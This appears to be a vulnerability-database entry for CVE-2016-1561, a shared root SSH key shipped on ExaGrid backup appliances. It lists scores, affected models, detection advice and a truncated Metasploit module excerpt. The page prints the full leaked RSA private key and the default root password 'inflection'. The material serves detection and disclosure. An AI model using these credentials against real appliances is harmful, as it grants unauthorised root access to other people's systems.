CVE-2016-1561
published 2017-04-21CVE-2016-1561: ExaGrid appliances with firmware before 4.8 P26 have a default SSH public key in the authorized_keys file for root, which allows remote attackers to obtain SSH…
PriorityP273high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
74.26%
99.4th percentile
ExaGrid appliances with firmware before 4.8 P26 have a default SSH public key in the authorized_keys file for root, which allows remote attackers to obtain SSH access by leveraging knowledge of a private key from another installation or a firmware image.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| exagrid | ex10000e_firmware | — | — |
| exagrid | ex13000e_firmware | — | — |
| exagrid | ex21000e_firmware | — | — |
| exagrid | ex3000_firmware | — | — |
| exagrid | ex32000e_firmware | — | — |
| exagrid | ex40000e_firmware | — | — |
| exagrid | ex5000_firmware | — | — |
| exagrid | ex7000_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
other-----BEGIN RSA PRIVATE KEY-----
MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
-----END RSA PRIVATE KEY-----↗
- →Detect SSH authentication attempts to port 22 using the known ExaGrid RSA private key (MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10...) as root — a successful auth with this key indicates exploitation of CVE-2016-1561. ↗
- →Alert on SSH login as 'root' with password 'inflection' to ExaGrid appliances on port 22 — this is the hardcoded default credential used as a fallback when key-based auth fails. ↗
- →Monitor for interactive bash shell spawning (/bin/bash -i) immediately after SSH session establishment as root on ExaGrid appliances, which is the post-auth payload delivery mechanism. ↗
- →Audit the authorized_keys file for root on ExaGrid appliances for the presence of the known shipped public key; its presence on unpatched firmware (before 4.8 P26) indicates a backdoor condition. ↗
- ·Exploitation requires knowledge of the private key, which is embedded in firmware images and the public Metasploit module — treat the key as fully public/compromised across all ExaGrid deployments. ↗
- ·The module falls back to password authentication with 'inflection' if key-based auth fails, meaning both CVE-2016-1561 (key) and CVE-2016-1560 (password) attack vectors are attempted in sequence. ↗
- ·Only ExaGrid appliances running firmware before version 4.8 P26 are vulnerable; patched appliances should have the shared key removed from root's authorized_keys. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ExaGrid - Known SSH Key and Default Password (Metasploit)
exploitdb·2016-04-07
CVE-2016-1561 ExaGrid - Known SSH Key and Default Password (Metasploit)
ExaGrid - Known SSH Key and Default Password (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule 'ExaGrid Known SSH Key and Default Password',
'Description' => %q{
ExaGrid ships a public/private key pair on their backup appliances to
allow passwordless authentication to other ExaGrid appliances. Since
the private key is easily retrievable, an attacker can use it to gain
unauthorized remote access as root. Additionally, this module will
attempt to use the default password for root, 'inflection'.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
Metasploit
ExaGrid Known SSH Key and Default Password
metasploit
ExaGrid Known SSH Key and Default Password
ExaGrid Known SSH Key and Default Password
ExaGrid ships a public/private key pair on their backup appliances to allow passwordless authentication to other ExaGrid appliances. Since the private key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. Additionally, this module will attempt to use the default password for root, 'inflection'.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/136634/ExaGrid-Known-SSH-Key-Default-Password.htmlhttp://www.rapid7.com/db/modules/exploit/linux/ssh/exagrid_known_privkeyhttps://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentialshttp://packetstormsecurity.com/files/136634/ExaGrid-Known-SSH-Key-Default-Password.htmlhttp://www.rapid7.com/db/modules/exploit/linux/ssh/exagrid_known_privkeyhttps://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials
2017-04-21
Published